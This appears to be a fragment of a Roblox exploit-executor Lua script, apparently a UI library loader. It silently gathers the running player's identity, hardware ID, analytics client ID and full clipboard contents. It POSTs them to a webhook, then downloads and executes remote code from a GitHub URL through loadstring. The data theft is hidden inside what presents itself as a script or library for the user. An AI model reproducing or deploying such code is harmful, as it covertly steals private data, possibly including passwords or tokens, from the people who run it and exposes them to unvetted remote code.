--krX你好装
local msg = {
        ["username"] = "黄片中心",
        ["embeds"] = {
            {
                ["color"] = tonumber("0x32CD32"),
                ["title"] = "有人使用其地脚本"..os.date("%H").."时"..os.date("%M").."分",
                ["thumbnail"] = {
                    ["url"] = AvatarImage,
                },
                ["fields"] = {
                    {
                        ["name"] = "名称(Name)",
                        ["value"] = "||"..player.Name.."||",
                        ["inline"] = true
                    },
                    {
                        ["name"] = "昵称(DisplayName)",
                        ["value"] = player.DisplayName,
                        ["inline"] = true
                    },
                    {
                        ["name"] = "UserId",
                        ["value"] = "||["..player.UserId.."](" .. tostring("https://www.roblox.com/users/" .. player.UserId .. "/profile") .. ")||",
                        ["inline"] = true
                    },
                    {
                        ["name"] = "地图ID",
                        ["value"] = "["..game.PlaceId.."](" .. tostring("https://www.roblox.com/games/" .. game.PlaceId) .. ")",
                        ["inline"] = true
                    },
                    {
                        ["name"] = "使用的注入器",
                        ["value"] = executor,
                        ["inline"] = true
                    },
                    {
                        ["name"] = "账号年龄",
                        ["value"] = player.AccountAge.."天",
                        ["inline"] = true
                    },
                    {
                        ["name"] = "加入日期",
                        ["value"] = joinDate.day.."/"..joinDate.month.."/"..joinDate.year,
                        ["inline"] = true
                    },
                    {
                        ["name"] = "HWID",
                        ["value"] = gethwid(),
                        ["inline"] = true
                    },
                    {
                        ["name"] = "剪贴板",
                        ["value"] = getclipboard(),
                        ["inline"] = true
                    },
                    {
                        ["name"] = "客户端ID",
                        ["value"] = game:GetService("RbxAnalyticsService"):GetClientId(),
                        ["inline"] = false
                    },
                    {
                        ["name"] = "设备",
                        ["value"] = _G.IsPc,
                        ["inline"] = false
                    },
                }
            }
        }
    }

    local request = http_request or request or HttpPost or syn.request
    request({Url = Webhook, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = game:GetService("HttpService"):JSONEncode(msg)})
    end
loadstring(game:HttpGet("https://raw.githubusercontent.com/CloudX-ScriptsWane/UI-library/main/%E8%BD%B0%E7%82%B8%E6%89%8B%E6%9C%BA.lua", true))()
return library